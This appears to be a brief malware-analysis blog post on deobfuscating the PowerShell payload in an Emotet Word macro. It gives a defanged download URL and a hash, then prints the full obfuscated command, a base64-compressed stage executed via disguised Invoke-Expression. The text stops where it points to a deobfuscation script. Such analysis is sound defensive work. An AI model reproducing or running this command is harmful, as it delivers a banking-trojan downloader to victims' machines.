Deobfuscating Emotet’s powershell payload

3 min readNov 8, 2018

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet is a polymorphic Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services.

Case 1:

I start my analysis by download this Document “Untitled-84617482333317.doc” hosted in hxxp://ecsconsultancy.com.au/En_us/Transactions/2018-11/ (md5:0f72b971327d2b5902d21704a94138eb).

The Word document files spread via botnet contains a malicious macro as shown.The next step is to deobfuscate this macro.So,i try to dump out the stream from the Untitled-84617482333317.doc” with “oledump”

CMD C:\wINdows\systEM32\cMd /c “SEt KQI= (nEW-oBJecT SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( ‘PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=’ ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&( ([strIng]$verBOsEpreFeRence)[1,3]+’X’-JoiN’’)&& PoWErshELL ^& ( \”{0}{1}\” -f’SET-ItE’,’m’ ) (‘Va’ +’RI’+ ‘AbLE:jW1V’) ( [tYpE](\”{1}{0}{2}\” -f’nVi’,’E’,’rONMENT’) ) ; ^&( ${En`V:`comS`PeC}[4,24,25]-join’’ )( ( ( . ( \”{1}{0}{2}{3}\” -f’-ch’,’gEt’,’IlDiT’,’EM’ ) ( ‘vA’ + ‘rI’+’aBle:jW1v’ ) ).VALue::( \”{3}{0}{1}{4}{6}{5}{2}\” -f ‘Vir’,’On’,’BlE’,’gEten’,’Me’,’vaRIa’,’NT’ ).Invoke( ‘kqi’,( \”{0}{2}{1}\” -f ‘pro’,’sS’,’CE’ ) ) ) )”

To deobfuscate the macro,i use this script https://raw.githubusercontent.com/lasq88/deobfuscate/master/deobfuscate.py or we can use this script